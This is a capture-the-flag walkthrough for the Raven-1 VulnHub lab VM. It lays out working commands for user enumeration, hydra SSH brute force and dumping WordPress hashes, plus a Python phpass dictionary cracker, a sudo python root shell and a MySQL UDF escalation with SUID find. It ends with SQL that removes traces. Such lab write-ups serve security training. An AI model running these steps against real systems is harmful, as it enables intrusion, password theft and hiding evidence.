Target: Raven-1 ~ VulnHub
Difficulty: 2.0 / 10.0. This post briefly records each stage of the walkthrough; not every step is covered in full detail, and some of the content may be wrong. Readers are welcome to point out mistakes, thanks!
Summary: after scanning, enumerate the web service on port 80. Scan the WordPress install with WPScan, which turns up two usernames; hydra then brute-forces SSH and recovers michael's password, giving a low-privileged shell. Once logged in, read wp-config.php to obtain the MySQL login, and pull the password hashes from the wp_users table; steven's hash is cracked with john. Switch to steven, and sudo -l shows he may run python as root, which yields a root shell. If the hash will not crack, look at the MySQL service instead: mysqld runs as root and a UDF library can be loaded through it, so the classic UDF privilege escalation also leads to root.
To be improved: WPScan usage, john usage, UDF privilege escalation research
Host discovery & port scanning
Target IP: 192.168.1.13
Port scan results:
hhh@Kali2020:~$ sudo nmap -A -O -sS -p- -T5 192.168.1.13
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-04 11:13 CST
Nmap scan report for raven (192.168.1.13)
Host is up (0.00030s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 46902/tcp6 status
| 100024 1 48039/udp6 status
| 100024 1 53045/udp status
|_ 100024 1 57612/tcp status
57612/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:A4:67:7C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.30 ms raven (192.168.1.13)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds
Information gathering
- Directory enumeration
dirb http://192.168.1.13
Scan results:
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.13/ ----
==> DIRECTORY: http://192.168.1.13/css/
==> DIRECTORY: http://192.168.1.13/fonts/
==> DIRECTORY: http://192.168.1.13/img/
+ http://192.168.1.13/index.html (CODE:200|SIZE:16819)
==> DIRECTORY: http://192.168.1.13/js/
==> DIRECTORY: http://192.168.1.13/manual/
+ http://192.168.1.13/server-status (CODE:403|SIZE:300)
==> DIRECTORY: http://192.168.1.13/vendor/
==> DIRECTORY: http://192.168.1.13/wordpress/
There is a /wordpress directory, and flag1 was found in the HTML source of the site's service page.
- Scan the WordPress install with WPScan; it enumerates two usernames
wpscan --url "http://192.168.1.13/wordpress" -eu
--url: target URL
-eu: -e selects enumeration, u selects users, i.e. enumerate users (WPScan brute-forces ?author=N author IDs and confirms each name through the login form's error messages, as the output below shows)
Scan results:
[i] User(s) Identified:
[+] steven
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] michael
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Gaining access
- Brute-force the SSH passwords of both users with hydra; only michael's was recovered
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.13 ssh
NB: user.txt contains the two usernames; rockyou.txt must be decompressed before use (NB = nota bene, "take note")
Results:
[22][ssh] host: 192.168.1.13 login: michael password: michael
Login successful
Privilege escalation
Route 1: switch user
The current user michael has no sudo rights (sudo -l shows nothing)
Go to the WordPress directory and look for information
- The MySQL account and password are in wp-config.php
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
- Log into the database and keep digging
Both users' password hashes are obtained
mysql -uroot -pR@v3nSecurity
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
- Copy steven's hash into a text file and crack it with john
# store the hash
hhh@Kali2020:~$ cat pass.txt
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
# crack it (john auto-detects the $P$ phpass / WordPress format)
hhh@Kali2020:~$ john pass.txt
# show the recovered plaintext
hhh@Kali2020:~$ john --show pass.txt
?:pink84
An online hash-lookup site such as https://www.somd5.com/ can also be tried: enter $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/,
click decrypt and wait a moment. Note that a $P$ hash is a salted, iterated MD5 (phpass), not a bare MD5, so the site must support that format.
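To make clear what john is doing with that $P$ value, the Python below (an added example, not part of the original writeup or of john) reimplements the phpass "portable" hash that WordPress stores in wp_users.user_pass and runs a dictionary attack against steven's hash from the dump above. The setting prefix encodes the iteration count (the character after $P$) and an 8-character salt, so every candidate costs 2^13 = 8192 MD5 rounds here; the mini wordlist is constructed for the example and stands in for rockyou.txt.

```python
import hashlib
from typing import Iterable, Optional

# phpass alphabet: index of a character = its 6-bit value
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass's private base64 variant: little-endian, 6 bits per char, no padding."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, setting: str) -> str:
    """Recompute a WordPress portable hash.

    setting is the first 12 characters of a stored hash:
      "$P$" + one char encoding log2(iterations) + 8-char salt.
    Returns the full 34-character hash string.
    """
    if setting[:3] != "$P$":
        raise ValueError("not a phpass portable ($P$) hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    salt = setting[4:12].encode()
    pw = password.encode()
    # md5(salt . password), then 2**count_log2 rounds of md5(previous . password)
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_verify(password: str, stored: str) -> bool:
    """True if password reproduces the stored hash (salt and rounds taken from it)."""
    return phpass_hash(password, stored[:12]) == stored


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate that reproduces stored, else None."""
    for candidate in wordlist:
        if phpass_verify(candidate, stored):
            return candidate
    return None


# steven's hash exactly as dumped from wp_users above
STEVEN_HASH = "$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/"

# Constructed mini wordlist for the example (stands in for rockyou.txt)
WORDLIST = ["123456", "password", "steven", "raven", "pink84", "michael"]

if __name__ == "__main__":
    print("iterations:", 1 << ITOA64.index(STEVEN_HASH[3]))
    print("cracked:", crack(STEVEN_HASH, WORDLIST))
```

Because the salt is random per user, a lookup table built for one hash is useless for the next one; that is why a site that "decrypts" a $P$ value is really running the same candidate loop, and why john with rockyou.txt is the reliable path.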
- Log in as steven; sudo -l shows that he may run
/usr/bin/python
as root, so a root shell can be spawned through sudo python (the pty.spawn call below simply hands back an interactive bash running as uid 0)
$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
root@Raven:/var/www/html/wordpress# id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www/html/wordpress# cd /root/
root@Raven:~# ls
flag4.txt
root@Raven:~# cat flag4.txt
______
| ___
| |_/ /__ ___ _____ _ __
| // _` / / _ '_
| | (_| | V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
Route 2: UDF privilege escalation
UDF stands for User Defined Function. MySQL can load extra SQL functions from a shared library in its plugin directory; if mysqld runs as root and the database account can write a library into that directory, a malicious UDF can be registered that runs arbitrary commands as root. The exploit used here is Exploit-DB entry 1518: MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) - Linux local Exploit
Analyses of UDF privilege escalation:
udf提权原理详解 (explanation of the UDF privilege escalation principle)
MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662
- On Kali, search for the exploit and copy it to the current directory
searchsploit 1518
cp /usr/share/exploitdb/exploits/linux/local/1518.c .
- Compile it (the library must match the target's architecture and libc, and the resulting 1518.so has to end up on the target as /tmp/1518.so for the next step)
gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
- Log into the database and run the following in MySQL, in order
use mysql; # switch to the mysql database
create table foo(line blob); # create a new table foo
insert into foo values(load_file('/tmp/1518.so')); # read the binary contents of 1518.so into the table
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so'; # write the table contents out to the plugin directory
create function do_system returns integer soname '1518.so'; # register the UDF
select * from mysql.func; # list registered UDFs
select do_system('chmod u+s /usr/bin/find'); # call the UDF: mysqld runs the command as root and sets the SUID bit on find
exit # quit
Note the path
/usr/lib/mysql/plugin/1518.so
must be the server's actual plugin directory (check it with select @@plugin_dir;). The dumpfile is written by the mysqld process itself, so the step only works because mysqld runs as root here.
- Now run the command below: find is SUID root, so the shell it executes keeps effective uid 0
find . -exec /bin/sh -p \; -quit
-exec runs the given command for every match, and the ; must be escaped from the calling shell; -quit stops after the first match so you get one shell rather than one per file. -p stops bash from dropping the elevated euid (dash, the /bin/sh on Debian, keeps it anyway).
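Before committing to this route it is worth confirming the conditions it depends on, and cleaning up afterwards. The queries below are an added example, not part of the original writeup or of exploit 1518; they use only standard MySQL system variables and the mysql.func / mysql.user tables that the steps above already touch.

```sql
-- Precondition checks, run as the MySQL root user obtained from wp-config.php.

-- 1. Where must the library go? dumpfile below has to land exactly here
--    (on this box the writeup uses /usr/lib/mysql/plugin/).
SELECT @@plugin_dir;

-- 2. secure_file_priv restricts load_file() and INTO DUMPFILE.
--    Empty string = unrestricted; NULL = disabled; a path = only inside that path.
--    Anything but empty means /tmp/1518.so cannot be read or the plugin dir cannot be written.
SELECT @@secure_file_priv;

-- 3. Architecture and version, so 1518.so is compiled for the right target
--    (a 32-bit .so will not load into a 64-bit mysqld).
SELECT @@version, @@version_compile_machine, @@version_compile_os;

-- 4. The account needs the FILE privilege for load_file()/DUMPFILE and
--    CREATE/INSERT on mysql.func to register the function.
SHOW GRANTS FOR CURRENT_USER();

-- 5. Which uid the command will run as is a property of the mysqld process, not of
--    SQL: from the shell, ps -o user= -p "$(pidof mysqld)" should print root.

-- After escalation, verify the function exists and then remove the traces:
SELECT name, dl FROM mysql.func;
DROP FUNCTION do_system;
DROP TABLE mysql.foo;
```

If secure_file_priv is NULL or points at a directory, the load_file / dumpfile pair fails silently (the INSERT stores NULL and the dumpfile is empty), which is the most common reason the UDF route "does nothing"; check it before blaming the compiled library.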
Further details:
Summary
- WPScan
- hydra
- cracking the WordPress password hashes taken from the MySQL database with john
- indirect privilege escalation via sudo python
- UDF privilege escalation